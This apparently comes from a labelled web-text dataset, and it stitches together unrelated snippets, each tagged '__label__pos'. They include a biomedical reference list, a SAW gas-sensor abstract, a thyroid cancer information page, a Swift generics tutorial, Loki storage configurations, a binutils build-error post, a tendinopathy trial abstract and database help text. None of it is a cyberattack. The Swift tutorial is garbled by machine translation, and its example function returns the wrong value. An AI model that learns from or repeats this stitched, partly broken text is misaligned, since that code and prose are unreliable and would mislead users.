Kemp BE. Insulin activation of acetyl-CoA carboxylase accompanied by inhibition of the 5′-AMP-activated protein kinase. J Biol Chem. 1992;267:2864–2867. [PubMed] 29. Russell RR, et al. Translocation of myocardial GLUT4 and increased glucose uptake through activation of AMPK by AICAR. Am J Physiol. 1999;277:H643–H649. [PubMed] 30. Marsin AS, et al. Phosphorylation and activation of heart PFK-2 by AMPK has a role in the stimulation of glycolysis during ischemia. Curr Biol. 2000;10:1247–1255. [PubMed] 31. Nishino Y, et al. Ischemic preconditioning activates AMPK in a PKC-dependent manner and induces GLUT4 up-regulation in the late phase of cardioprotection. Cardiovasc Res. 2004;61:610–619. [PubMed] 32. Xing Y, et al. Glucose metabolism and energy homeostasis in mouse hearts overexpressing dominant negative alpha2 subunit of AMP-activated protein kinase. J Biol Chem. 2003;278:28372–28377. [PubMed] 33. Towler MC, Hardie DG. AMP-activated protein kinase in metabolic control and insulin signaling. Circ Res. 2007;100:328–341. [PubMed] 34. Zoncu R, et al. mTOR: from growth signal integration to cancer, diabetes and ageing. Nature Rev Mol Cell Biol. 2011;12:21–35. [PMC free article] [PubMed] 35. Um SH, et al. Nutrient overload, insulin resistance, and ribosomal protein S6 kinase 1, S6K1. Cell Metab. 2006;3:393–402. [PubMed] 36. Um SH, et al. Absence of S6K1 protects against age- and diet-induced obesity while enhancing insulin sensitivity. Nature. 2004;431:200–205. [PubMed] 37. Kumar A, et al. Fat cell-specific ablation of rictor in mice impairs insulin-regulated fat cell and whole-body glucose and lipid metabolism. Diabetes. 2010;59:1397–1406. [PMC free article] [PubMed] 38. Kemi OJ, et al. Activation or inactivation of cardiac Akt/mTOR signaling diverges physiological from pathological hypertrophy. J Cell Physiol. 2008;214:316–321. [PubMed] 39. McMullen JR, et al. Inhibition of mTOR signaling with rapamycin regresses established cardiac hypertrophy induced by pressure overload. Circulation. 2004;109:3050–3055. [PubMed] 40. Song X, et al. mTOR attenuates the inflammatory response in cardiomyocytes and prevents cardiac dysfunction in pathological hypertrophy. Am J Physiol Cell Physiol. 2010;299:C1256–C1266. [PubMed] 41. Zhang D, et al. MTORC1 regulates cardiac function and myocyte survival through 4E-BP1 inhibition in mice. J Clin Invest. 2010;120:2805–2816. [PMC free article] [PubMed] 42. Stanley WC, et al. Regulation of energy substrate metabolism in the diabetic heart. Cardiovascular Res. 1997;34:25–33. [PubMed] 43. Kolter T, et al. Molecular analysis of insulin resistance in isolated ventricular cardiomyocytes of obese Zucker rats. Am J Physiol. 1997;273:E59–E67. [PubMed] 44. Ohtake T, et al. Myocardial glucose metabolism in noninsulin-dependent diabetes mellitus patients evaluated by FDG-PET. J Nucl Med. 1995;36:456–463. [PubMed] 45. Iozzo P, et al. Independent association of type 2 diabetes and coronary artery disease with myocardial insulin resistance. Diabetes. 2002;51:3020–3024. [PubMed] 46. Park SY, et al. Unraveling the temporal pattern of diet-induced insulin resistance in individual organs and cardiac dysfunction in C57BL/6 mice. Diabetes. 2005;54:3530–3540. [PubMed] 47. Buchanan U, et al. Reduced cardiac efficiency and altered substrate metabolism precedes the onset of hyperglycemia and contractile dysfunction in two mouse models of insulin resistance and obesity. Endocrinology. 2005;146:5341–5349. [PubMed] 48. Zhou YT, et al. Lipotoxic heart disease in obese rats: implications for human obesity. Proc Natl Acad Sci USA. 2000;97:1784–1789. [PubMed] 49. Lopaschuk GD. Abnormal mechanical function in diabetes: relationship to altered myocardial carbohydrates/lipid metabolism. Coronary Artery Dis. 1996;7:116–123. [PubMed] 50. Rosen ED, Spiegelman BM. PPARγ: a nuclear regulator of metabolism, differentiation, and cell growth. J Biol Chem. 2001;276:37731–37734. [PubMed] 51. Finck BN, et al. The cardiac phenotype induced by PPARα overexpression mimics that caused by diabetes mellitus. J Clin Invest. 2002;109:121–130. [PMC free article] [PubMed] 52. Park SY, et al. Cardiac-specific overexpression of peroxisome proliferator-activated receptor-α causes insulin resistance in heart and liver. Diabetes. 2005;54:2514–2524. [PubMed] 53. Kahn CR. Insulin action, diabetogenes, and the cause of type II diabetes. Diabetes. 1994;43:1066–1084. [PubMed] 54. Boden G, Shulman GI. Free fatty acids in obesity and type 2 diabetes: defining their role in the development of insulin resistance and beta-cell dysfunction. Eur J Clin Invest. 2002;32(3):14–23. [PubMed] 55. DeFronzo RA. The triumvirate: beta-cell, muscle, liver. A collusion responsible for NIDDM. Diabetes. 1988;37:667–687. [PubMed] 56. Czech MP, Corvera S. Signaling mechanisms that regulate glucose transport. J Biol Chem. 1999;274:1865–1868. [PubMed] 57. Boudina S, et al. Insulin signaling coordinately regulates cardiac size, metabolism, and contractile protein isoform expression. J Clin Invest. 2002;109:629–639. [PMC free article] [PubMed] 58. Randle PJ, et al. The glucose fatty-acid cycle: its role in insulin sensitivity and the metabolic disturbances of diabetes mellitus. Lancet. 1963;281:785–789. [PubMed] 59. Unger RH. Lipotoxic diseases. Annu Rev Med. 2002;53:319–336. [PubMed] 60. Goldberg IJ. Lipoprotein lipase and lipolysis: central roles in lipoprotein metabolism and atherogenesis. J Lipid Res. 1996;37:693–707. [PubMed] 61. Kim JK, et al. Tissue-specific overexpression of lipoprotein lipase causes tissue-specific insulin resistance. Proc Natl Acad Sci USA. 2001;98:7522–7527. [PubMed] 62. Weston CR, Davis RJ. The JNK signal transduction pathway. Curr Opin Cell Biol. 2007;19:142–149. [PubMed] 63. Kim JK, et al. PKC-theta knockout mice are protected from fat-induced insulin resistance. J Clin Invest. 2004;114:823–827. [PMC free article] [PubMed] 64. Kim JK, et al. Prevention of fat-induced insulin resistance by salicylate. J Clin Invest. 2001;108:437–446. [PMC free article] [PubMed] 65. Park TS, et al. Ceramide is a cardiotoxin in lipotoxic cardiomyopathy. J Lipid Res. 2008;49:2101–2112. [PubMed] 66. Rui L, et al. Insulin/IGF-1 and TNF-α stimulate phosphorylation of IRS-1 at inhibitory Ser307 via distinct pathways. J Clin Invest. 2001;107:181–189. [PMC free article] [PubMed] 67. Lee J, et al. Multiple abnormalities of myocardial insulin signaling in a porcine model of diet-induced obesity. Am J Physiol Heart Circ Physiol. 2010;298:H310–H319. [PubMed] 68. Wright JJ, et al. Mechanisms for increased myocardial fatty acid utilization following short-term high-fat feeding. Cardiovasc Res. 2009;82:351–360. [PMC free article] [PubMed] 69. Szczepaniak LS, et al. Myocardial triglycerides and systolic function in humans: in vivo evaluation by localized proton spectroscopy and cardiac imaging. Magn Reson Med. 2003;49:417–423. [PubMed] 70. Christoffersen C, et al. Cardiac lipid accumulation associated with diastolic dysfunction in obese mice. Endocrinology. 2003;144:3483–3490. [PubMed] 71. Petersen KF, et al. Mitochondrial dysfunction in the elderly: possible role in insulin resistance. Science. 2003;300:1140–1142. [PMC free article] [PubMed] 72. Boudina S, et al. Reduced mitochondrial oxidative capacity and increased mitochondrial uncoupling impair myocardial energetics in obesity. Circulation. 2005;112:2686–2695. [PubMed] 73. Boudina S, et al. Contribution of impaired myocardial insulin signaling to mitochondrial dysfunction and oxidative stress in the heart. Circulation. 2009;119:1271–1283. [PMC free article] [PubMed] 74. Laskowski KR, Russell RR. Uncoupling proteins in heart failure. Curr Heart Failure Rep. 2008;5:75–79. [PMC free article] [PubMed] 75. Gimeno RE, et al. Cloning and characterization of an uncoupling protein homolog: a potential molecular mediator of human thermogenesis. Diabetes. 1997;46:900–906. [PubMed] 76. Boudina S, et al. Mitochondrial energetics in the heart in obesity-related diabetes: direct evidence for increased uncoupled respiration and activation of uncoupling proteins. Diabetes. 56:2457–2466. [PubMed] 77. Scheuermann-Freestone M, et al. Abnormal cardiac and skeletal muscle energy metabolism in patients with type 2 diabetes. Circulation. 2003;107:3040–3046. [PubMed] 78. Bugger H, Abel ED. Mitochondria in the diabetic heart. Cardiovasc Res. 2010;88:229–240. [PMC free article] [PubMed] 79. Duncan JG, et al. Insulin-resistant hearts exhibits a mitochondrial biogenic response driven by the peroxisome proliferator-activated receptor-alpha/PGC-1alpha gene regulatory pathway. Circulation. 2007;115:909–917. [PMC free article] [PubMed] 80. Axelsen LN, et al. Cardiac and metabolic changes in long-term high fructose-fat fed rats with severe obesity and extensive intramyocardial lipid accumulation. Am J Physiol Regul Integr Comp Physiol. 2010;298:R1560–R1570. [PubMed] 81. Hoeks J, et al. Prolonged fasting identifies skeletal muscle mitochondrial dysfunction as consequence rather than cause of human insulin resistance. Diabetes. 2010;59:2117–2125. [PMC free article] [PubMed] 82. Wellen KF, Hotamisligil GS. Inflammation, stress, diabetes. J Clin Invest. 2005;115:1111–1119. [PMC free article] [PubMed] 83. Kanda H, et al. MCP-1 contributes to macropahge infiltration into adipose tissue, insulin resistance, and hepatic steatosis in obesity. J Clin Invest. 2006;116:1494–1505. [PubMed] 84. Cinti S, et al. Adipocyte death defines macrophage localization and function in adipose tissue of obese mice and humans. J Lipid Res. 2005;46:2347–2355. [PubMed] 85. Xu H, et al. Chronic inflammation in fat plays a crucial role in the development of obesity-related insulin resistance. J Clin Invest. 2003;112:1821–1830. [PMC free article] [PubMed] 86. Weisberg SP, et al. CCR2 modulates inflammatory and metabolic effects of high-fat feeding. J Clin Invest. 2006;116:115–124. [PubMed] 87. Hotamisligil GS, et al. Adipose expression of tumor necrosis factor-alpha: direct role in obesity-linked insulin resistance. Science. 1993;259:87–91. [PubMed] 88. Gwechenberger M, et al. Cardiac myocytes produce interleukin-6 in culture and in viable border zone of reperfused infarctions. Circulation. 1999;99:546–551. [PubMed] 89. Kim HJ, et al. Differential effects of interleukin-6 and -10 on skeletal muscle and liver insulin action in vivo. Diabetes. 2004;53:1060–1067. [PubMed] 90. Ueki K, et al. Suppressor of cytokine signaling 1 (SOCS-1) and SOCS-3 cause insulin resistance through inhibition of tyrosine phosphorylation of insulin receptor substrate proteins by discrete mechanisms. Mol Cell Biol. 2004;24:5434–5446. [PMC free article] [PubMed] 91. Shi H, et al. Suppressor of cytokine signaling 3 is a physiological regulator of adipocyte insulin signaling. J Biol Chem. 2004;279:34733–34740. [PubMed] 92. Boden G. Fatty acid-induced inflammation and insulin resistance in skeletal muscle and liver. Curr Diabetes Reports. 2006;6:177–181. [PubMed] 93. Olefsky JM, Glass CK. Macrophages, inflammation, and insulin resistance. Annu Rev Physiol. 2010;72:219–246. [PubMed] 94. Kewalramani G, et al. Muscle insulin resistance: assault by lipids, cytokines, and local macrophages. Curr Opin Clin Nutr & Metab Care. 2010;13:382–390. [PubMed] 95. Hong EG, et al. Interleukin-10 prevents diet-induced insulin resistance by attenuating macrophage and cytokine response in skeletal muscle. Diabetes. 2009;58:2525–35. [PMC free article] [PubMed] 96. Ribas V, et al. Impaired oxidative metabolism and inflammation are associated with insulin resistance in ERα-deficient mice. Am J Physiol Endocrinol Metab. 2010;298:E304–E319. [PubMed] 97. Nunemaker CS, et al. 12-Lipoxygenase-knockout mice are resistant to inflammatory effects of obesity induced by Western diet. Am J Physiol Endocrinol Metab. 2008;295:E1065–1075. [PubMed] 98. Ko HJ, et al. Nutrient stress activates inflammation and reduces glucose metabolism by suppressing AMP-activated protein kinase in heart. Diabetes. 2009;58:2536–46. [PMC free article] [PubMed] 99. Sabio G, et al. A stress signaling pathway in adipose tissue regulates hepatic insulin resistance. Science. 2008;322:1539–1543. [PMC free article] [PubMed] 100. Kaufman RJ, et al. The unfolded protein response in nutrient sensing and differentiation. Nat Rev Mol Cell Biol. 2002;3:411–421. [PubMed] 101. Lee AH, et al. XBP-1 regulates a subset of endoplasmic reticulum resident chaperone genes in the unfolded protein response. Mol Cell Biol. 2003;23:7448–7459. [PMC free article] [PubMed] 102. Hirosumi J, et al. A central role for JNK in obesity and insulin resistance. Nature. 2002;420:333–6. [PubMed] 103. Ozcan U, et al. Chemical chaperones reduce ER stress and restore glucose homeostasis in a mouse model of type 2 diabetes. Science. 2006;313:1137–1140. [PMC free article] [PubMed] 104. Lee AS. The glucose-regulated proteins: stress induction and clinical applications. Trends Biochem Sci. 2001;26:504–10. [PubMed] 105. Ye R, et al. Grp78 heterozygosity promotes adaptive unfolded protein response and attenuates diet-induced obesity and insulin resistance. Diabetes. 2010;59:6–16. [PMC free article] [PubMed] 106. Costanzo-Garvey DL, et al. KSR2 is an essential regulator of AMP kinase, energy expenditure, and insulin sensitivity. Cell Metab. 2009;10:366–378. [PMC free article] [PubMed] 107. Sabio G, et al. Role of muscle c-Jun NH2-terminal kinase 1 in obesity-induced insulin resistance. Mol Cell Biol. 2010;30:106–115. [PMC free article] [PubMed] 108. Sabio G, et al. Prevention of steatosis by hepatic JNK1. Cell Metab. 2009;10:491–498. [PMC free article] [PubMed] 109. Sabio G, et al. Role of the hypothalamic-pituitary-thyroid axis in metabolic regulation by JNK1. Genes Dev. 2010;24:256–264. [PubMed] 110. Djaberi R, et al. Non-invasive cardiac imaging techniques and vascular tools for the assessment of cardiovascular disease in type 2 diabetes mellitus. Diabetologia. 2008;51:1581–1593. [PMC free article] [PubMed] 111. Elkeles RA. Coronary artery calcium and cardiovascular risk in diabetes. Atherosclerosis. 2010;210:331–336. [PubMed]  
__label__pos
0.878245
Please login first Modeling and FEM simulation of love wave SAW-based Dichloromethane gas sensor * 1 , 1 , * 2 1  PhD Scholar NIT Calicut 2  Associate Professor and HoD ,School of Materials Science and Engineering ,National Institute of Technology Calicut Academic Editor: Francisco Falcone Abstract: Dichloromethane (DCM) or methyl chloride is a volatile organic compounds (VOC) infamous for its carcinogenic properties. The gas mainly used in industrial solvents is found to cause lung and liver cancers in animal experiments, whereas they are proven to cause cancers of the brain, liver, and a few types of blood cancers including Non-Hodgkin’s lymphoma in humans. The deteriorative effects are found to exposure as low as 200 ppm for a few continuous hours, whereas exposure above 1000 ppm is found to cause cancers in mammals. Among the various techniques available today for the detection of gases in atmospheric air the SAW (Surface Acoustic Wave) sensors are highly accurate. SAW offers higher sensitivity, simplicity of fabrication, rapid response time, room temperature operation, and/or the possibility of wireless operation at low costs. In this paper, FEM design and analysis of the Surface Acoustic Wave technology based on love waves was used for detecting volatile organic gases. The 3D gas sensor was composed of interdigitated transducers modeled on a piezoelectric substrate and covered by a guiding layer of SiO2, and on top of that was a film of polyisobutylene (PIB) that served as the sensing layer. The material used for the piezoelectric substrate was 640YZ-cut Lithium Niobate (LiNbO3) for love wave generation, and the lightweight electrodes were made of Aluminium (Al). Analytical simulations were conducted using COMSOL Multiphysics 6.0 software based on the Finite Element Method (FEM). The impact of mass loading on the sensing layer was utilized to detect volatile organic gases. The resonant frequency of the SAW device was determined, and simulations were performed by exposing the sensor to dichloromethane gas at concentrations ranging from 0 to 1000 ppm. This work also described the analysis of various parameters of the SAW sensor such as the quality factor, coupling coefficient, equivalent circuit components, S parameter, and admittance. The simulation result exhibited a linear frequency shift of the sensor with dichloromethane gas concentration and explained the behavior of the sensor through its equivalent circuit. Keywords: Surface Acoustic Wave; Love wave; COMSOL Multiphysics; Gas Sensor; VOC Top
__label__pos
0.989505
Thyroid cancer You are here:  If thyroid cancer spreads Cancer cells can spread from the thyroid to other parts of the body. This spread is called metastasis. Understanding how a type of cancer usually grows and spreads helps your healthcare team plan your treatment and future care. If thyroid cancer spreads, it can spread to the following. Regional metastasis Regional metastasis means that the cancer has spread to organs or tissues close to or around the thyroid, including: • muscles, blood vessels or nerves in the neck • the larynx (voice box) • the trachea (windpipe) • the esophagus • the hypopharynx (bottom part of the throat) • lymph nodes in the neck • lymph nodes between the lungs (called mediastinal lymph nodes) Distant metastasis Distant metastasis means that the cancer has spread to other parts of the body farther from the thyroid, including: esophagus The muscular tube in the neck and chest through which food passes from the pharynx (throat) to the stomach. Esophageal means referring to or having to do with the esophagus, as in esophageal cancer. Also called the gullet. Stories Dr Guy Sauvageau Progress in leukemias Read more Funding world-class research Icon - paper Cancer affects all Canadians but together we can reduce the burden by investing in research and prevention efforts. Learn about the impact of our funded research. Learn more
__label__pos
0.943085
2021swift parameter and generic parameter reference! Time:2021-9-16 This section covers generic types, generic functions, and parameters of generic constructors, including formal and arguments. When declaring a generic type, function, or constructor, you must specify the corresponding type parameters. A type parameter is equivalent to a placeholder. When a generic type is instantiated, a generic function or a generic constructor is called, it is replaced with a specific type argument. 2021swift parameter and generic parameter reference! For an overview of the generics of swift language, see generics (Part II, Chapter 22). Generic parameter statement Generic parameter statements specify the type parameters of a generic type or function, and the associated constraints and requirements for these parameters. Generic parameter statements are enclosed by angle brackets (< >), and have the following two forms: 1. <generic parameter list> <generic parameter list where requirements > 1. <generic parameter list> <generic parameter list where requirements > The generic parameters in the generic parameter list are separated by commas, and each takes the following form: 1. type parameter : constrain Generic parameters consist of two parts: type parameters and optional constraints after them. Type parameters are just the names of placeholder types (such as t, u, V, keytype, ValueType, etc.). You can use it in generic types, the rest of functions or constructor declarations, and the signatures of functions or constructors. Constraints are used to indicate that the type parameter inherits from a class or complies with a protocol or part of a protocol. For example, in the following generic, the generic parameter t: comparable means that any type argument used to replace the type parameter t must meet the comparable protocol. 1. func simpleMin<T: COmparable>(x: T, y: T) -> T { 2. if x < y { 3. return y 4. } 5. return x 6. } For example, both int and double meet the comparable protocol, and this function accepts any type. In contrast to generic types, you do not need to specify generic argument statements when calling generic functions or constructors. Type arguments are inferred from arguments passed to a function or constructor. 1. simpleMin(17, 42) 2. // T is inferred to be Int 3. simpleMin(3.14159, 2.71828) 4. // T is inferred to be Double Data collection office Where statement To specify additional requirements for type parameters and their associated types, you can add a where statement after the generic parameter list. The where statement consists of the keyword where and its subsequent comma separated requirements. The requirements in the where statement are used to indicate that the type parameter inherits from a class or complies with a protocol or part of a protocol. Although the where statement helps to express simple constraints on type parameters (for example, t: comparable is equivalent to t where, t: comparable, etc.), it can still be used to provide more complex constraints on type parameters and their associated constraints. For example, < T where t: C, t: P > indicates that the generic type T inherits from class C and complies with protocol P. As mentioned above, the association type of the constraint type parameter can be forced to comply with a protocol< T: Generator where t.element: equable > means that t complies with the generator protocol, and t’s association type t.element complies with the eauatable protocol (t has an association type because the generator declares an element, while t complies with the Generator Protocol). You can also use the operator = = to specify the equivalent requirements of two types. For example, there is such a constraint: T and u comply with the generator protocol, and their association types are required to be the same. It can be expressed as follows: < T: generator, u: generator where t.element = = u.element >. Of course, type arguments that replace type parameters must meet the constraints and requirements required by all type parameters. Generic functions or constructors can be overloaded, but type parameters in generic parameter statements must have different constraints or requirements, or both. When an overloaded generic function or constructor is called, the compiler uses these constraints to determine which overloaded function or constructor to call. A generic class can generate a subclass, but the subclass must also be a generic class. Syntax of generic parameter clauses. Parameter clause → < generic parameter list ­ Requirement – clause >. Generic parameter list → generic parameter list, generic parameter list. Generic parameter → type name. Generic parameter → type name: type identifier. Generic parameter protocol type name: → composition type. Requirements clause → where? Requirements-List? Requirements-List→Requirements-Requirements,Requirements-List­。 Requirements→Conformance-Requirements-Same-Type-Requirements。 Consistency – Requirements → type identifier: type identifier. Consistency – protocol type required – identifier: → – combination – type. Same type requirements → type identifier ­== Type identifier Generic argument statement Generic argument statementspecifies the type argument of a generic type. The generic argument statement is enclosed by angle brackets (< >), as follows: 1. < generic argument list > Type arguments in the generic argument list are separated by commas. The type argument is the name of the actual concrete type, which is used to replace the corresponding type parameter in the generic parameter statement of the generic type. This results in a specialized version of the generic type. For example, the generic dictionary type of swift standard library is defined as follows: 1. struct Dictionary<KeyTypel: Hashable, ValueType>: Collection, DictionaryLiteralConvertibl e { /* .. */ } A specialized version of the generic dictionary type. Dictionary < string, int > is generated by replacing the generic types keytype: hashable and ValueType with specific string and int types. Each type argument must satisfy all the constraints of the generic parameter it replaces, including the additional requirements specified by any where statement. In the above example, the type parameter keytype must meet the hashable protocol, so the string must also meet the hashable protocol. Type parameters can be replaced by type arguments that are themselves specialized versions of generic types (assuming that appropriate constraints and requirements have been met). For example, in order to generate an array whose element type is an integer array, you can replace the type parameter t of the generic type array with the specialized version of array array. 1. let arrayOfArrays: Array<Array<Int>> = [[1, 2, 3], [4, 5, 6], [7, 8, 9]] As described in the generic parameter statement, a generic argument statement cannot be used to specify the type arguments of a generic function or constructor. The grammar of generic argument clauses. Generic self variable quantum Sentence List < – Generic – parameter – List – > →. Generic parameter list → generic parameter, generic parameter, generic parameter list. Generic parameter → type Data collection office Due to the limited space of the article, you can only point to introduce some current work achievements and thoughts. Each Swift has some new directions to explore. If you are interested in understanding the underlying principle of IOS, architecture design, system construction and how to interview, you can also pay attention to me to obtain the latest information and interview related information in time. If you have any comments and suggestions, please leave me a message! You are welcome to point out the bad places. I hope you can leave more messages and discuss them. Let’s make progress together! Friends who like IOS can pay attention to me and learn and communicate together!!!
__label__pos
0.942174
ConfigurationExamples Loki Configuration Examples Complete Local config auth_enabled: false server: http_listen_port: 3100 ingester: lifecycler: address: 127.0.0.1 ring: kvstore: store: inmemory replication_factor: 1 final_sleep: 0s chunk_idle_period: 5m chunk_retain_period: 30s schema_config: configs: - from: 2020-05-15 store: boltdb object_store: filesystem schema: v11 index: prefix: index_ period: 168h storage_config: boltdb: directory: /tmp/loki/index filesystem: directory: /tmp/loki/chunks limits_config: enforce_metric_name: false reject_old_samples: true reject_old_samples_max_age: 168h Google Cloud Storage This is partial config that uses GCS and Bigtable for the chunk and index stores, respectively. schema_config: configs: - from: 2020-05-15 store: bigtable object_store: gcs schema: v11 index: prefix: loki_index_ period: 168h storage_config: bigtable: instance: BIGTABLE_INSTANCE project: BIGTABLE_PROJECT gcs: bucket_name: GCS_BUCKET_NAME Cassandra Index This is a partial config that uses the local filesystem for chunk storage and Cassandra for the index storage: schema_config: configs: - from: 2020-05-15 store: cassandra object_store: filesystem schema: v11 index: prefix: cassandra_table period: 168h storage_config: cassandra: username: cassandra password: cassandra addresses: 127.0.0.1 auth: true keyspace: lokiindex filesystem: directory: /tmp/loki/chunks AWS This is a partial config that uses S3 for chunk storage and DynamoDB for the index storage: schema_config: configs: - from: 2020-05-15 store: aws object_store: s3 schema: v11 index: prefix: loki_ storage_config: aws: s3: s3://access_key:secret_access_key@region/bucket_name dynamodb: dynamodb_url: dynamodb://access_key:secret_access_key@region If you don’t wish to hard-code S3 credentials, you can also configure an EC2 instance role by changing the storage_config section: storage_config: aws: s3: s3://region/bucket_name dynamodb: dynamodb_url: dynamodb://region S3-compatible APIs S3-compatible APIs (e.g. Ceph Object Storage with an S3-compatible API) can be used. If the API supports path-style URL rather than virtual hosted bucket addressing, configure the URL in storage_config with the custom endpoint: storage_config: aws: s3: s3://access_key:secret_access_key@custom_endpoint/bucket_name s3forcepathstyle: true S3 Expanded Config S3 config now supports expanded config. Either s3 endpoint URL can be used or expanded config can be used. storage_config: aws: bucketnames: bucket_name1, bucket_name2 endpoint: s3.endpoint.com region: s3_region access_key_id: s3_access_key_id secret_access_key: s3_secret_access_key insecure: false sse_encryption: false http_config: idle_conn_timeout: 90s response_header_timeout: 0s insecure_skip_verify: false s3forcepathstyle: true Almost zero dependencies setup This is a configuration to deploy Loki depending only on storage solution, e.g. an S3-compatible API like minio. The ring configuration is based on the gossip memberlist and the index is shipped to storage via Single Store (boltdb-shipper). auth_enabled: false server: http_listen_port: 3100 distributor: ring: kvstore: store: memberlist ingester: lifecycler: ring: kvstore: store: memberlist replication_factor: 1 final_sleep: 0s chunk_idle_period: 5m chunk_retain_period: 30s memberlist: abort_if_cluster_join_fails: false # Expose this port on all distributor, ingester # and querier replicas. bind_port: 7946 # You can use a headless k8s service for all distributor, # ingester and querier components. join_members: - loki-gossip-ring.loki.svc.cluster.local:7946 max_join_backoff: 1m max_join_retries: 10 min_join_backoff: 1s schema_config: configs: - from: 2020-05-15 store: boltdb-shipper object_store: s3 schema: v11 index: prefix: index_ period: 168h storage_config: boltdb_shipper: active_index_directory: /loki/index cache_location: /loki/index_cache shared_store: s3 aws: s3: s3://access_key:secret_access_key@custom_endpoint/bucket_name s3forcepathstyle: true limits_config: enforce_metric_name: false reject_old_samples: true reject_old_samples_max_age: 168h compactor: working_directory: /data/compactor shared_store: s3 compaction_interval: 5m schema_config configs: # Starting from 2018-04-15 Loki should store indexes on Cassandra # using weekly periodic tables and chunks on filesystem. # The index tables will be prefixed with "index_". - from: "2018-04-15" store: cassandra object_store: filesystem schema: v11 index: period: 168h prefix: index_ # Starting from 2020-6-15 we moved from filesystem to AWS S3 for storing the chunks. - from: "2020-06-15" store: cassandra object_store: s3 schema: v11 index: period: 168h prefix: index_ Query Frontend example configuration
__label__pos
0.979507
help-gnu-utils [Top][All Lists] Advanced [Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index] Installing binutils on HPUX 10.20 From: Ingram, Charles D. Subject: Installing binutils on HPUX 10.20 Date: Tue, 5 Nov 2002 11:37:23 -0800 There is a problem listed at: http://mail.gnu.org/pipermail/help-gnu-utils/2002-August/002736.html which is the same problem I am having. However, I cannot find any replies with possible solutions to the problem. I am trying to build binutils 2.7. After the ./configure, I run make and receive the following errors: ---------------------------------------------------------------------------- ------------------------------------------------------------- In file included from /usr/include/sys/stat.h:28, from fdmatch.c:53: /usr/include/sys/_stat_body.h:22: parse error before `blkcnt_t' /usr/include/sys/_stat_body.h:22: warning: no semicolon at end of struct = or union /usr/include/sys/_stat_body.h:23: parse error before `:' /usr/include/sys/_stat_body.h:24: parse error before `:' /usr/include/sys/_stat_body.h:25: parse error before `:' /usr/include/sys/_stat_body.h:52: parse error before `st_spare4' /usr/include/sys/_stat_body.h:52: ANSI C forbids data definition with no = type or storage class /usr/include/sys/_stat_body.h:53: parse error before `}' /usr/include/sys/_stat_body.h:53: warning: ANSI C does not allow extra = `;' outside of a function fdmatch.c: In function `fdmatch': fdmatch.c:59: storage size of `sbuf1' isn't known fdmatch.c:60: storage size of `sbuf2' isn't known fdmatch.c:60: warning: unused variable `sbuf2' fdmatch.c:59: warning: unused variable `sbuf1' make[1]: *** [fdmatch.o] Error 1 make[1]: Leaving directory `/wms/tmp/binutils-2.11.2/libiberty' make: *** [all-libiberty] Error 2 ---------------------------------------------------------------------------- ------------------------------------------------------------- If I use a non-gnu make and compiler, it will build, but I understand that it is better to use gnu products to build other gnu products. I use GNUmake 3.75 and gcc 2.7.2 and receive the errors above. Charles Dean Ingram Northrup Grumman IT 540-644-2154 "Charlie" [email protected] reply via email to [Prev in Thread] Current Thread [Next in Thread]
__label__pos
0.562081
Article Text Download PDFPDF Topical glyceryl trinitrate treatment of chronic patellar tendinopathy: a randomised, double-blind, placebo-controlled clinical trial 1. Mirjam Steunebrink1, 2. Johannes Zwerver2, 3. Ruben Brandsema2, 4. Petra Groenenboom3, 5. Inge van den Akker-Scheek2, 6. Adam Weir3 1. 1Department of Steunebrink Sportsmedicine, Eelde, The Netherlands 2. 2Department of Sportsmedicine, University Medical Center Groningen, Groningen, The Netherlands 3. 3Department of Sportsmedicine, Medical Center Haaglanden, Leidschendam, The Netherlands 1. Correspondence to Mirjam Steunebrink, Steunebrink Sportsmedicine, Vosbergerlaan 1, 9761 AK, Eelde, The Netherlands; mirjamsteunebrink{at}gmail.com Abstract Objectives To assess if continuous topical glyceryl trinitrate (GTN) treatment improves outcome in patients with chronic patellar tendinopathy when compared with eccentric training alone. Methods Randomised double-blind, placebo-controlled clinical trial comparing a 12-week programme of using a GTN or placebo patch in combination with eccentric squats on a decline board. Measurements were performed at baseline, 6, 12 and 24 weeks. Primary outcome measure was the Victorian Institute of Sports Assessment-Patella (VISA-P) questionnaire. Secondary outcome measures were patient satisfaction and pain scores during sports. Generalised estimated equation was used to analyse the treatment, time and treatment×time effect. Analyses were performed following the intention-to-treat principle. Results VISA-P scores for both groups improved over the study period to 75.0±16.2 and 80.7±22.1 at 24 weeks. Results showed a significant effect for time (p<0.01) but no effect for treatment×time (p=0.80). Mean Visual Analogue Scores pain scores during sports for both groups increased over the study period to 6.6±3 and 7.8±3.1. Results showed a significant effect for time (p<0.01) but no effect for treatment×time (p=0.38). Patient satisfaction showed no difference between GTN and placebo groups (p=0.25) after 24 weeks, but did show a significant difference over time (p=0.01). Three patients in the GTN group reported some rash. Conclusion It seems that continuous topical GTN treatment in addition to an eccentric exercise programme does not improve clinical outcome compared to placebo patches and an eccentric exercise programme in patients with chronic patellar tendinopathy. • Tendons • Knee • Eccentric exercise This is an Open Access article distributed in accordance with the Creative Commons Attribution Non Commercial (CC BY-NC 3.0) license, which permits others to distribute, remix, adapt, build upon this work non-commercially, and license their derivative works on different terms, provided the original work is properly cited and the use is non-commercial. See: http://creativecommons.org/licenses/by-nc/3.0/ Statistics from Altmetric.com Request Permissions If you wish to reuse any or all of this article please use the link below which will take you to the Copyright Clearance Center’s RightsLink service. You will be able to get a quick price and instant permission to reuse the content in many different ways.
__label__pos
0.890922
Altova DatabaseSpy 2023 Professional Edition A primary key may include multiple columns, in which case it is known as a "composite" primary key. To create a composite primary key: 1.In the Online Browser, right-click the first column and select Create Primary Key from the context menu. 2.Right-click another column and select Add Column to Primary Key from the context menu. If necessary, repeat this step for each column that needs to be added to the primary key. 3.Click the Execute Change Script dbs_ic_execute_script button in the Database Structure Change Script window. To remove a column from a composite primary key: 1.In the Online Browser, expand the primary key dbs_ic_primary_key in the "Keys" folder of a table. 2.Right-click the column that is to be removed from the primary key, and select Remove Column from Key from the context menu. 3.Click the Execute Change Script dbs_ic_execute_script button in the Database Structure Change Script window. © 2017-2023 Altova GmbH
__label__pos
0.999995
